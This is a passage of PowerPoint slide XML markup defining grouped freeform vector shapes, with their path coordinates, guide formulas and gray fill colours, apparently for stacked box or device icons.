                        <a:gd name="T2" fmla="*/ 0 w 1280"/>
                        <a:gd name="T3" fmla="*/ 265 h 607"/>
                        <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                        <a:gd name="T5" fmla="*/ 607 h 607"/>
                        <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                        <a:gd name="T7" fmla="*/ 343 h 607"/>
                        <a:gd name="T8" fmla="*/ 0 w 1280"/>
                        <a:gd name="T9" fmla="*/ 0 h 607"/>
                        <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T11" fmla="*/ 567 h 607"/>
                        <a:gd name="T12" fmla="*/ 33 w 1280"/>
                        <a:gd name="T13" fmla="*/ 241 h 607"/>
                        <a:gd name="T14" fmla="*/ 33 w 1280"/>
                        <a:gd name="T15" fmla="*/ 43 h 607"/>
                        <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                        <a:gd name="T17" fmla="*/ 366 h 607"/>
                        <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T19" fmla="*/ 366 h 607"/>
                        <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T21" fmla="*/ 567 h 60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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="1280" h="607">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="265"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1280" y="607"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1280" y="343"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1250" y="567"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="33" y="241"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="33" y="43"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1247" y="366"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1250" y="366"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1250" y="567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>
                      <a:solidFill>
                        <a:srgbClr val="545554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74" name="Freeform 25">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B8DDA9-4808-4A6D-B81F-7668E799E193}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr>
                      <a:spLocks noEditPoints="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="4616" y="1681"/>
                      <a:ext cx="361" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1280"/>
                        <a:gd name="T1" fmla="*/ 0 h 607"/>
                        <a:gd name="T2" fmla="*/ 0 w 1280"/>
                        <a:gd name="T3" fmla="*/ 264 h 607"/>
                        <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                        <a:gd name="T5" fmla="*/ 607 h 607"/>
                        <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                        <a:gd name="T7" fmla="*/ 342 h 607"/>
                        <a:gd name="T8" fmla="*/ 0 w 1280"/>
                        <a:gd name="T9" fmla="*/ 0 h 607"/>
                        <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T11" fmla="*/ 564 h 607"/>
                        <a:gd name="T12" fmla="*/ 33 w 1280"/>
                        <a:gd name="T13" fmla="*/ 241 h 607"/>
                        <a:gd name="T14" fmla="*/ 33 w 1280"/>
                        <a:gd name="T15" fmla="*/ 40 h 607"/>
                        <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                        <a:gd name="T17" fmla="*/ 366 h 607"/>
                        <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T19" fmla="*/ 366 h 607"/>
                        <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T21" fmla="*/ 564 h 60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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="1280" h="607">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1280" y="607"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1280" y="342"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1250" y="564"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="33" y="241"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="33" y="40"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1247" y="366"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1250" y="366"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1250" y="564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>
                      <a:solidFill>
                        <a:srgbClr val="545554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870" name="Freeform 26">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9AAC3AA-E48F-451D-BC2B-C8ECAE347E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3716" y="1975"/>
                    <a:ext cx="216" cy="956"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 255"/>
                      <a:gd name="T1" fmla="*/ 68 h 1129"/>
                      <a:gd name="T2" fmla="*/ 0 w 255"/>
                      <a:gd name="T3" fmla="*/ 333 h 1129"/>
                      <a:gd name="T4" fmla="*/ 0 w 255"/>
                      <a:gd name="T5" fmla="*/ 373 h 1129"/>
                      <a:gd name="T6" fmla="*/ 0 w 255"/>
                      <a:gd name="T7" fmla="*/ 564 h 1129"/>
                      <a:gd name="T8" fmla="*/ 0 w 255"/>
                      <a:gd name="T9" fmla="*/ 597 h 1129"/>
                      <a:gd name="T10" fmla="*/ 0 w 255"/>
                      <a:gd name="T11" fmla="*/ 864 h 1129"/>
                      <a:gd name="T12" fmla="*/ 0 w 255"/>
                      <a:gd name="T13" fmla="*/ 897 h 1129"/>
                      <a:gd name="T14" fmla="*/ 0 w 255"/>
                      <a:gd name="T15" fmla="*/ 1129 h 1129"/>
                      <a:gd name="T16" fmla="*/ 255 w 255"/>
                      <a:gd name="T17" fmla="*/ 1060 h 1129"/>
                      <a:gd name="T18" fmla="*/ 255 w 255"/>
                      <a:gd name="T19" fmla="*/ 829 h 1129"/>
                      <a:gd name="T20" fmla="*/ 255 w 255"/>
                      <a:gd name="T21" fmla="*/ 796 h 1129"/>
                      <a:gd name="T22" fmla="*/ 255 w 255"/>
                      <a:gd name="T23" fmla="*/ 529 h 1129"/>
                      <a:gd name="T24" fmla="*/ 255 w 255"/>
                      <a:gd name="T25" fmla="*/ 496 h 1129"/>
                      <a:gd name="T26" fmla="*/ 255 w 255"/>
                      <a:gd name="T27" fmla="*/ 304 h 1129"/>
                      <a:gd name="T28" fmla="*/ 255 w 255"/>
                      <a:gd name="T29" fmla="*/ 264 h 1129"/>
                      <a:gd name="T30" fmla="*/ 255 w 255"/>
                      <a:gd name="T31" fmla="*/ 0 h 1129"/>
                      <a:gd name="T32" fmla="*/ 0 w 255"/>
                      <a:gd name="T33" fmla="*/ 68 h 11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55" h="1129">
                        <a:moveTo>
                          <a:pt x="0" y="68"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="333"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="373"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="564"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="597"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="864"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="897"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1129"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="255" y="1060"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="255" y="829"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="255" y="796"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="255" y="529"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="255" y="496"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="255" y="304"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="255" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="255" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="68"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="828282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659" name="Group 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D30B39B-5804-4656-AE34-B0B45031CD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6" y="1834"/>
                  <a:ext cx="1288" cy="1238"/>
                  <a:chOff x="1079" y="1709"/>
                  <a:chExt cx="1300" cy="1250"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1682" name="Group 28">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E072C23D-6D05-41A9-8EE1-529BCF00C08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079" y="1709"/>
                    <a:ext cx="1300" cy="1250"/>
                    <a:chOff x="1079" y="1709"/>
                    <a:chExt cx="1300" cy="1250"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="1740" name="Group 29">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A2DB81-86C3-4847-AC41-51006E074D1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079" y="2385"/>
                      <a:ext cx="1300" cy="574"/>
                      <a:chOff x="1079" y="2385"/>
                      <a:chExt cx="1300" cy="574"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="1834" name="Group 30">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2728584F-EA99-42A1-B9A1-218EB27B8982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 flipH="1">
                        <a:off x="1946" y="2385"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1859" name="Freeform 31">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02391D6C-378D-4B53-8022-7D577ABFE1E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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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60" name="Freeform 32">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3612C5F8-52AD-4419-8DD3-00F4489B120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3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030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61" name="Freeform 33">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B36568-5CBA-45C9-BC21-CF6917E8B00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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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62" name="Freeform 34">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C7D49E-C041-4AFF-8B7E-F51A960D567A}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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63" name="Freeform 35">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28BC3299-4260-4CEE-8CF1-CB1BE11EF52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E6E6E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835" name="Group 36">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C322F8C-1FE8-4885-A822-B3545EA270E2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 flipH="1">
                        <a:off x="1728" y="2443"/>
                        <a:ext cx="434" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1854" name="Freeform 37">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4798C7E-3AFA-421A-993D-D0AD9A272D8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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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55" name="Freeform 38">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{189B3810-FA48-4A30-9FB3-1F300BBE446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3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030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56" name="Freeform 39">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967616F4-11B5-4043-B5D9-D490DF6BB5C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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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57" name="Freeform 40">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A99E47B5-A22A-49A7-9485-9194B04317D7}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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58" name="Freeform 41">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B9642C7-7287-437D-BEE4-7FCEE5EC0AB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E6E6E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836" name="Group 42">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BB2CC9A-EF66-4791-A46B-6E593C3903D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 flipH="1">
                        <a:off x="1512" y="2501"/>
                        <a:ext cx="433" cy="342"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1849" name="Freeform 43">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65AD4CB-7561-4856-BD3A-E1D9E0C1128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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
